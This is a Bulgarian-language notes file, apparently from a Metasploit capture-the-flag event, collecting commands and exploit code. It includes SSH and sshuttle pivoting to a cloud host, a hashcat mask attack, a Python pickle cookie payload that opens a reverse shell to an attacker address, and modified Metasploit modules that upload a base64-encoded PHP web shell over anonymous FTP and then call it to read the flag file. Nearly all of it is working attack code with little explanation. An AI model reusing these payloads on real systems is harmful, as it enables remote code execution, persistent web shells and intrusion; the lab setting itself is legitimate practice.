# Полезни команди
`sshuttle -vvv -e 'ssh -i ./metasploit_ctf_kali_ssh_key.pem' -r kali@34.227.205.13 -x 34.227.205.13 172.15.1.117/32`
`ssh -i metasploit_ctf_kali_ssh_key.pem -Nf -D 127.0.0.1:9050 kali@34.227.205.13
`
Noob хашкотка:
`hashcat -m 0 pass_to_crack.txt -a 3 ihatesalt?1?1?1?1?1?1 -i --increment-min 9 --increment-max 15 -1 ?l?d --force -O`
Port 8888 > cookie deserialization vuln:
```
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = """
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.15.1.116",44444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
"""
return os.system, (cmd,)
pickled = pickle.dumps(RCE())
print(base64.b64encode(pickled))
```
порт 8101
за upoload на "test.php" което да послужи после за rce през ftp-то
```
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Anonymous FTP Access Detection',
'Description' => 'Detect anonymous (read/write) FTP server access.',
'References' =>
[
['URL', 'http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(21),
])
end
def run_host(target_host)
begin
res = connect_login(true, false)
banner.strip! if banner
dir = Rex::Text.rand_text_alpha(8)
data = Base64.decode64('PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImUiXSk7ID8+Cg==')
if res
#write_check = send_cmd(['cd', files] , true)
write_check = send_cmd( ["CWD", 'files'], true )
#raw_send_recv('DIR')
#raw_send_recv('PWD')
if write_check && write_check =~ /^2/
send_cmd_data(["PUT", "test.php"], data, "I")
print_good("#{target_host}:#{rport} - Anonymous READ/WRITE (#{banner})")
access_type = 'Read/Write'
else
print_good("#{target_host}:#{rport} - Anonymous READ (#{banner})")
access_type = 'Read-only'
end
register_creds(target_host, access_type)
end
disconnect
rescue ::Interrupt
raise $ERROR_INFO
rescue ::Rex::ConnectionError, ::IOError
end
end
def register_creds(target_host, access_type)
# Build service information
service_data = {
address: target_host,
port: datastore['RPORT'],
service_name: 'ftp',
protocol: 'tcp',
workspace_id: myworkspace_id
}
# Build credential information
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['FTPPASS'],
private_type: :password,
username: datastore['FTPUSER'],
workspace_id: myworkspace_id
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
access_level: access_type,
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL,
workspace_id: myworkspace_id
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
```
и resource скрипта с него
```
# The module is copied to `modules/exploits/`, so don't change this
use exploit/module
# Do your datastore initialization here
# e.g.:
# set USERNAME foo
# set payload ...
set FTPUSER ftpuser
set FTPPASS ftpuser
# Make sure everything is alright
show options
# this will execute the module and put any session in background
run -z
# This block of ruby code is useful to make sure a session is setup before
# interacting with it. Feel free to update this code.
<ruby>
print_status('Waiting a bit to make sure the session is completely setup...')
timeout = 10
loop do
break if (timeout == 0) || (framework.sessions.any? && framework.sessions.first[1].sys)
sleep 1
timeout -= 1
end
if framework.sessions.any? && framework.sessions.first[1].sys
# Here is where we can interact with the session (shell or meterpreter).
# The session number should be 1 at this point.
# e.g. (for a meterpreter session):
# run_single("sessions -i 1 -C 'ls'")
# run_single("sessions -i 1 -C 'cat /etc/passwd'")
end
</ruby>
```
за rce-то
като модул скрипт
```
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Anonymous FTP Access Detection',
'Description' => 'Detect anonymous (read/write) FTP server access.',
'References' =>
[
['URL', 'http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],
],
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
])
end
def run_host(target_host)
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php', '?e=cat+/var/www/5_of_clubs*|base64'),
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
if res && res.code == 200
vprint_status("#{peer} - Works! (response code: Found#{res.body})")
end
if res && res.code == 404
fail_with(Failure::UnexpectedReply, "#{peer} - Check target uri:error code #{res.code}")
end
rescue ::Rex::ConnectionError
raise $ERROR_INFO
rescue ::Rex::ConnectionError, ::IOError
end
end
def register_creds(target_host, access_type)
# Build service information
service_data = {
address: target_host,
port: datastore['RPORT'],
service_name: 'ftp',
protocol: 'tcp',
workspace_id: myworkspace_id
}
# Build credential information
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['FTPPASS'],
private_type: :password,
username: datastore['FTPUSER'],
workspace_id: myworkspace_id
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
access_level: access_type,
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL,
workspace_id: myworkspace_id
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
```
като ресурс файл
```
# The module is copied to `modules/exploits/`, so don't change this
use exploit/module
# Do your datastore initialization here
# e.g.:
# set USERNAME foo
# set payload ...
set TARGETURI files/test.php
#set TARGETURI index.php
# Make sure everything is alright
show options
# this will execute the module and put any session in background
run -z
# This block of ruby code is useful to make sure a session is setup before
# interacting with it. Feel free to update this code.
<ruby>
print_status('Waiting a bit to make sure the session is completely setup...')
timeout = 10
loop do
break if (timeout == 0) || (framework.sessions.any? && framework.sessions.first[1].sys)
sleep 1
timeout -= 1
end
if framework.sessions.any? && framework.sessions.first[1].sys
# Here is where we can interact with the session (shell or meterpreter).
# The session number should be 1 at this point.
# e.g. (for a meterpreter session):
# run_single("sessions -i 1 -C 'ls'")
# run_single("sessions -i 1 -C 'cat /etc/passwd'")
end
</ruby>
```
флага е в /var/www/5_of_clubs.png
Sign in with Wallet
Connect another wallet